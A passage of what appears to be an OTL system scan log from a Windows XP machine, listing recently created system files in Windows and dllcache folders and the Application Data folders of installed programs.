[2010/02/13 09:47:36 | 000,086,180 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud4.wav
[2010/02/13 09:47:36 | 000,086,180 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud2.wav
[2010/02/13 09:47:36 | 000,069,612 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplayer.adm
[2010/02/13 09:47:36 | 000,066,725 | ---- | C] () -- C:\WINDOWS\System32\dllcache\revert.wmz
[2010/02/13 09:47:36 | 000,029,070 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmp.inf
[2010/02/13 09:47:36 | 000,023,829 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tourbg.gif
[2010/02/13 09:47:36 | 000,023,195 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplay.chm
[2010/02/13 09:47:36 | 000,017,489 | ---- | C] () -- C:\WINDOWS\System32\dllcache\videobg.gif
[2010/02/13 09:47:36 | 000,017,272 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmdm.inf
[2010/02/13 09:47:36 | 000,008,677 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm7.gif
[2010/02/13 09:47:36 | 000,007,892 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm9.gif
[2010/02/13 09:47:36 | 000,007,636 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm2.gif
[2010/02/13 09:47:36 | 000,007,369 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm4.gif
[2010/02/13 09:47:36 | 000,006,769 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmfsdk.inf
[2010/02/13 09:47:36 | 000,006,241 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm3.gif
[2010/02/13 09:47:36 | 000,006,060 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm6.gif
[2010/02/13 09:47:36 | 000,005,789 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm1.gif
[2010/02/13 09:47:36 | 000,005,290 | ---- | C] () -- C:\WINDOWS\System32\dllcache\vidsamp.gif
[2010/02/13 09:47:36 | 000,004,193 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm8.gif
[2010/02/13 09:47:36 | 000,003,187 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tour.js
[2010/02/13 09:47:36 | 000,002,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wm5.gif
[2010/02/13 09:47:36 | 000,002,469 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tplay.gif
[2010/02/13 09:47:36 | 000,002,450 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tpause.gif
[2010/02/13 09:47:36 | 000,002,375 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tplayh.gif
[2010/02/13 09:47:36 | 000,002,371 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tpauseh.gif
[2010/02/13 09:47:36 | 000,001,398 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taon.gif
[2010/02/13 09:47:36 | 000,001,380 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taonh.gif
[2010/02/13 09:47:36 | 000,001,380 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taoff.gif
[2010/02/13 09:47:36 | 000,001,367 | ---- | C] () -- C:\WINDOWS\System32\dllcache\taoffh.gif
[2010/02/13 09:47:36 | 000,001,148 | ---- | C] () -- C:\WINDOWS\System32\dllcache\snd.htm
[2010/02/13 09:47:36 | 000,000,908 | ---- | C] () -- C:\WINDOWS\System32\dllcache\skins.inf
[2010/02/13 09:47:35 | 000,457,607 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mdlib.wmv
[2010/02/13 09:47:35 | 000,381,425 | ---- | C] () -- C:\WINDOWS\System32\dllcache\copycd.wmv
[2010/02/13 09:47:35 | 000,375,519 | ---- | C] () -- C:\WINDOWS\System32\dllcache\nuskin.wmv
[2010/02/13 09:47:35 | 000,184,959 | ---- | C] () -- C:\WINDOWS\System32\dllcache\compact.wmz
[2010/02/13 09:47:35 | 000,097,117 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.hlp
[2010/02/13 09:47:35 | 000,077,307 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plyr_err.chm
[2010/02/13 09:47:35 | 000,022,060 | ---- | C] () -- C:\WINDOWS\System32\dllcache\npds.zip
[2010/02/13 09:47:35 | 000,018,286 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.inf
[2010/02/13 09:47:35 | 000,009,585 | ---- | C] () -- C:\WINDOWS\System32\dllcache\controls.css
[2010/02/13 09:47:35 | 000,008,298 | ---- | C] () -- C:\WINDOWS\System32\dllcache\contents.htm
[2010/02/13 09:47:35 | 000,006,878 | ---- | C] () -- C:\WINDOWS\System32\dllcache\controls.js
[2010/02/13 09:47:35 | 000,005,971 | ---- | C] () -- C:\WINDOWS\System32\dllcache\events.js
[2010/02/13 09:47:35 | 000,002,778 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplogoh.gif
[2010/02/13 09:47:35 | 000,002,545 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplogo.gif
[2010/02/13 09:47:35 | 000,001,885 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mplayer2.cnt
[2010/02/13 09:47:35 | 000,001,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst6.wpl
[2010/02/13 09:47:35 | 000,001,477 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst5.wpl
[2010/02/13 09:47:35 | 000,001,474 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst3.wpl
[2010/02/13 09:47:35 | 000,001,451 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst12.wpl
[2010/02/13 09:47:35 | 000,001,448 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst4.wpl
[2010/02/13 09:47:35 | 000,001,250 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst1.wpl
[2010/02/13 09:47:35 | 000,001,049 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst2.wpl
[2010/02/13 09:47:35 | 000,001,046 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst7.wpl
[2010/02/13 09:47:35 | 000,001,036 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst8.wpl
[2010/02/13 09:47:35 | 000,000,789 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst11.wpl
[2010/02/13 09:47:35 | 000,000,787 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst10.wpl
[2010/02/13 09:47:35 | 000,000,784 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst9.wpl
[2010/02/13 09:47:35 | 000,000,783 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst13.wpl
[2010/02/13 09:47:35 | 000,000,775 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst14.wpl
[2010/02/13 09:47:35 | 000,000,773 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cnth.gif
[2010/02/13 09:47:35 | 000,000,772 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cntd.gif
[2010/02/13 09:47:35 | 000,000,733 | ---- | C] () -- C:\WINDOWS\System32\dllcache\plylst15.wpl
[2010/02/13 09:47:35 | 000,000,403 | ---- | C] () -- C:\WINDOWS\System32\dllcache\npdrmv2.zip
[2010/02/13 09:47:34 | 000,000,999 | ---- | C] () -- C:\WINDOWS\System32\dllcache\bktrh.gif
[2010/02/13 09:47:34 | 000,000,773 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cnt.gif
[2010/02/13 09:47:34 | 000,000,760 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cloapph.gif
[2010/02/13 09:47:34 | 000,000,717 | ---- | C] () -- C:\WINDOWS\System32\dllcache\cloapp.gif
[2010/02/13 09:45:06 | 000,064,352 | ---- | C] () -- C:\WINDOWS\System32\drivers\ativmc20.cod
[2010/02/13 09:45:05 | 000,129,045 | ---- | C] () -- C:\WINDOWS\System32\drivers\cxthsfs2.cty
[2010/02/13 09:45:05 | 000,067,866 | ---- | C] () -- C:\WINDOWS\System32\drivers\netwlan5.img
[2010/02/12 23:22:01 | 000,009,046 | ---- | C] () -- C:\WINDOWS\System32\nvinfo.pb
[2010/02/12 23:18:02 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2010/02/12 23:16:43 | 000,940,794 | ---- | C] () -- C:\WINDOWS\System32\LoopyMusic.wav
[2010/02/12 23:16:43 | 000,146,650 | ---- | C] () -- C:\WINDOWS\System32\BuzzingBee.wav
[2010/02/12 22:41:17 | 000,049,152 | ---- | C] () -- C:\WINDOWS\System32\ChCfg.exe
[2010/02/12 22:30:24 | 000,012,540 | ---- | C] () -- C:\WINDOWS\System32\wpa.bak
[2010/02/12 22:15:59 | 000,073,728 | ---- | C] () -- C:\WINDOWS\System32\RtNicProp32.dll
[2010/02/12 22:12:01 | 000,207,400 | R--- | C] () -- C:\WINDOWS\GSetup.exe
[2010/02/12 22:12:01 | 000,000,010 | ---- | C] () -- C:\WINDOWS\GSetup.ini
[2010/02/12 22:08:21 | 000,001,024 | -H-- | C] () -- C:\Documents and Settings\Me\ntuser.dat.LOG
[2010/02/12 22:08:21 | 000,000,178 | -HS- | C] () -- C:\Documents and Settings\Me\ntuser.ini
[2010/02/12 22:08:20 | 009,175,040 | -H-- | C] () -- C:\Documents and Settings\Me\NTUSER.DAT
[2010/02/12 22:07:32 | 000,008,192 | ---- | C] () -- C:\WINDOWS\REGLOCS.OLD
[2010/02/12 22:06:27 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2010/02/12 22:06:18 | 000,028,288 | ---- | C] () -- C:\WINDOWS\System32\dllcache\xjis.nls
[2010/02/12 22:05:51 | 000,083,748 | ---- | C] () -- C:\WINDOWS\System32\dllcache\prcp.nls
[2010/02/12 22:05:51 | 000,083,748 | ---- | C] () -- C:\WINDOWS\System32\dllcache\prc.nls
[2010/02/12 22:05:48 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\pintlcsa.dll
[2010/02/12 22:05:34 | 000,047,066 | ---- | C] () -- C:\WINDOWS\System32\dllcache\ksc.nls
[2010/02/12 22:05:33 | 001,158,818 | ---- | C] () -- C:\WINDOWS\System32\dllcache\korwbrkr.lex
[2010/02/12 22:05:26 | 000,059,392 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imscinst.exe
[2010/02/12 22:05:25 | 000,196,665 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imjpinst.exe
[2010/02/12 22:05:22 | 000,134,339 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imekr.lex
[2010/02/12 22:05:08 | 013,463,552 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hwxjpn.dll
[2010/02/12 22:05:01 | 000,108,827 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hanja.lex
[2010/02/12 22:04:46 | 000,173,568 | ---- | C] () -- C:\WINDOWS\System32\dllcache\chtskf.dll
[2010/02/12 22:04:42 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_864.nls
[2010/02/12 22:04:42 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_870.nls
[2010/02/12 22:04:41 | 000,180,770 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20932.nls
[2010/02/12 22:04:41 | 000,177,698 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20949.nls
[2010/02/12 22:04:41 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20936.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_862.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_858.nls
[2010/02/12 22:04:41 | 000,066,594 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_720.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_708.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_28596.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_21027.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_21025.nls
[2010/02/12 22:04:41 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20924.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20880.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20871.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20838.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20833.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20424.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20423.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20420.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20297.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20290.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20285.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20284.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20280.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20278.nls
[2010/02/12 22:04:40 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20277.nls
[2010/02/12 22:04:39 | 000,187,938 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20005.nls
[2010/02/12 22:04:39 | 000,186,402 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20001.nls
[2010/02/12 22:04:39 | 000,185,378 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20003.nls
[2010/02/12 22:04:39 | 000,180,258 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20004.nls
[2010/02/12 22:04:39 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20002.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20273.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20269.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20108.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20107.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20106.nls
[2010/02/12 22:04:39 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20105.nls
[2010/02/12 22:04:38 | 000,189,986 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1361.nls
[2010/02/12 22:04:38 | 000,180,258 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_20000.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1149.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1148.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1147.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1146.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1145.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1144.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1143.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1142.nls
[2010/02/12 22:04:38 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1141.nls
[2010/02/12 22:04:37 | 000,195,618 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10002.nls
[2010/02/12 22:04:37 | 000,177,698 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10003.nls
[2010/02/12 22:04:37 | 000,173,602 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10008.nls
[2010/02/12 22:04:37 | 000,162,850 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10001.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1140.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_1047.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10021.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10005.nls
[2010/02/12 22:04:37 | 000,066,082 | ---- | C] () -- C:\WINDOWS\System32\dllcache\c_10004.nls
[2010/02/12 22:04:36 | 000,082,172 | ---- | C] () -- C:\WINDOWS\System32\dllcache\bopomofo.nls
[2010/02/12 22:04:35 | 000,066,728 | ---- | C] () -- C:\WINDOWS\System32\dllcache\big5.nls
[2010/02/12 22:03:36 | 000,002,626 | ---- | C] () -- C:\WINDOWS\System32\CONFIG.NT
[2010/02/12 22:03:36 | 000,000,000 | RHS- | C] () -- C:\MSDOS.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | C] () -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | C] () -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | C] () -- C:\AUTOEXEC.BAT
[2010/02/12 22:03:33 | 000,023,392 | ---- | C] () -- C:\WINDOWS\System32\nscompat.tlb
[2010/02/12 22:03:33 | 000,016,832 | ---- | C] () -- C:\WINDOWS\System32\amcompat.tlb
[2010/02/12 22:03:32 | 000,316,640 | ---- | C] () -- C:\WINDOWS\WMSysPr9.prx
[2010/02/12 22:02:39 | 000,000,488 | ---- | C] () -- C:\WINDOWS\System32\WindowsLogon.manifest
[2010/02/12 22:02:39 | 000,000,488 | ---- | C] () -- C:\WINDOWS\System32\logonui.exe.manifest
[2010/02/12 22:02:35 | 000,000,749 | RH-- | C] () -- C:\WINDOWS\WindowsShell.Manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\sapi.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\nwc.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\ncpa.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | C] () -- C:\WINDOWS\System32\cdplayer.exe.manifest
[2010/02/12 22:02:17 | 004,399,505 | ---- | C] () -- C:\WINDOWS\System32\dllcache\nls302en.lex
[2010/02/12 22:01:26 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt256.bmp
[2010/02/12 22:01:26 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt.bmp
[2010/02/12 22:01:15 | 000,000,984 | ---- | C] () -- C:\WINDOWS\System32\dllcache\srframe.mmf
[2010/02/12 21:59:39 | 000,021,640 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2010/02/12 21:58:42 | 000,065,832 | ---- | C] () -- C:\WINDOWS\Santa Fe Stucco.bmp
[2010/02/12 21:58:42 | 000,026,680 | ---- | C] () -- C:\WINDOWS\River Sumida.bmp
[2010/02/12 21:58:42 | 000,017,362 | ---- | C] () -- C:\WINDOWS\Rhododendron.bmp
[2010/02/12 21:58:42 | 000,009,522 | ---- | C] () -- C:\WINDOWS\Zapotec.bmp
[2010/02/12 21:58:41 | 000,065,978 | ---- | C] () -- C:\WINDOWS\Soap Bubbles.bmp
[2010/02/12 21:58:41 | 000,065,954 | ---- | C] () -- C:\WINDOWS\Prairie Wind.bmp
[2010/02/12 21:58:41 | 000,026,582 | ---- | C] () -- C:\WINDOWS\Greenstone.bmp
[2010/02/12 21:58:41 | 000,017,336 | ---- | C] () -- C:\WINDOWS\Gone Fishing.bmp
[2010/02/12 21:58:41 | 000,017,062 | ---- | C] () -- C:\WINDOWS\Coffee Bean.bmp
[2010/02/12 21:58:41 | 000,016,730 | ---- | C] () -- C:\WINDOWS\FeatherTexture.bmp
[2010/02/12 21:58:40 | 000,093,702 | ---- | C] () -- C:\WINDOWS\System32\subrange.uce
[2010/02/12 21:58:40 | 000,016,740 | ---- | C] () -- C:\WINDOWS\System32\shiftjis.uce
[2010/02/12 21:58:40 | 000,001,272 | ---- | C] () -- C:\WINDOWS\Blue Lace 16.bmp
[2010/02/12 21:58:39 | 000,060,458 | ---- | C] () -- C:\WINDOWS\System32\ideograf.uce
[2010/02/12 21:58:39 | 000,024,006 | ---- | C] () -- C:\WINDOWS\System32\gb2312.uce
[2010/02/12 21:58:39 | 000,012,876 | ---- | C] () -- C:\WINDOWS\System32\korean.uce
[2010/02/12 21:58:39 | 000,008,484 | ---- | C] () -- C:\WINDOWS\System32\kanji_2.uce
[2010/02/12 21:58:39 | 000,006,948 | ---- | C] () -- C:\WINDOWS\System32\kanji_1.uce
[2010/02/12 21:58:38 | 000,022,984 | ---- | C] () -- C:\WINDOWS\System32\bopomofo.uce
[2010/02/12 21:58:35 | 000,003,286 | ---- | C] () -- C:\WINDOWS\System32\tslabels.h
[2010/02/12 21:58:35 | 000,001,161 | ---- | C] () -- C:\WINDOWS\System32\usrlogon.cmd
[2010/02/12 21:58:33 | 000,000,768 | ---- | C] () -- C:\WINDOWS\System32\msdtcprf.h
[2010/02/12 21:58:22 | 000,063,488 | ---- | C] () -- C:\WINDOWS\System32\wmimgmt.msc
[2009/11/06 10:58:04 | 000,178,975 | ---- | C] () -- C:\WINDOWS\System32\xlive.dll.cat
[2009/10/20 14:19:30 | 000,053,299 | ---- | C] () -- C:\WINDOWS\System32\pthreadVC.dll
[2009/07/30 21:58:42 | 000,000,314 | ---- | C] () -- C:\WINDOWS\primopdf.ini
[2009/05/27 05:48:08 | 000,094,208 | ---- | C] () -- C:\WINDOWS\System32\zmbv.dll

========== LOP Check ==========

[2010/03/19 19:31:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/04/11 21:04:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Avid
[2010/02/23 00:27:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Cakewalk
[2010/02/13 00:41:32 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\CanonBJ
[2010/02/14 01:12:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
[2010/05/06 20:35:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DonationCoder
[2010/04/15 22:24:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IObit
[2010/04/08 17:52:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MAGIX
[2010/02/23 00:49:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Native Instruments
[2010/04/12 00:19:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PACE Anti-Piracy
[2010/04/11 21:33:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Pinnacle
[2010/04/12 00:19:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Pinnacle Studio Ultimate
[2010/02/16 00:13:43 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Syncrosoft
[2010/04/24 17:00:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/02/26 16:29:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Virtualized Applications
[2010/02/24 18:38:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\VirtualizedApplications
[2010/04/19 22:27:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\YSFLIGHT.COM
[2010/02/23 00:49:48 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{0CC51CB2-911C-40BB-BC1B-BD3CAC590222}
[2010/02/23 00:49:31 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{4F32CAF7-963B-404D-BF13-C48BA3F5F6A7}
[2010/02/23 00:31:04 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{902029B2-957E-4066-85FA-30DA31731718}
[2010/05/06 20:37:06 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{A87EB928-0C6C-4071-AEF1-59E32BAEDF1B}
[2010/02/23 00:49:17 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{AC46DC4F-66BD-4733-A8B4-0B69418C12D0}
[2010/02/23 00:50:35 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{D69A48BF-7653-4AA8-94BC-5847522A4573}
[2010/02/23 00:48:52 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{EC98E512-708C-4C3B-9F07-B58768C1DD8A}
[2010/05/13 20:42:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\.purple
[2010/02/14 00:14:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Amazon
[2010/02/21 18:46:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Audacity
[2010/04/11 21:04:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Avid
[2010/02/23 00:34:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Cakewalk
[2010/02/13 21:00:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\DAEMON Tools Lite
[2010/05/06 20:36:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\DonationCoder
[2010/05/13 16:59:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Dropbox
[2010/04/20 20:18:33 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\flightgear.org
[2010/03/06 19:39:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Foxit
[2010/04/01 09:34:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Foxit Software
[2010/04/17 21:40:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\GetRightToGo
[2010/02/27 03:24:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\GrabIt
[2010/03/08 14:59:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\gtk-2.0
[2010/03/04 22:17:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\HandBrake
[2010/04/12 07:55:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\ImgBurn
[2010/04/07 20:38:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\IObit
[2010/02/18 20:19:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\KeePassX
[2010/02/21 19:38:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Leadertech
[2010/04/08 17:54:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\MAGIX
[2010/04/25 14:52:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mobipocket
[2010/02/15 16:16:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\NewsLeecher
[2010/03/29 19:57:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Notepad++
[2010/02/14 23:10:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\NVD
[2010/02/15 17:13:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\OpenOffice.org
[2010/04/12 00:19:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PACE Anti-Piracy
[2010/02/16 21:27:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PreSonus
[2010/05/12 15:45:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\PrimoPDF
[2010/03/15 19:44:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\SanDisk
[2010/02/21 15:32:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\ScummVM
[2010/02/26 19:05:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\SoftGrid Client
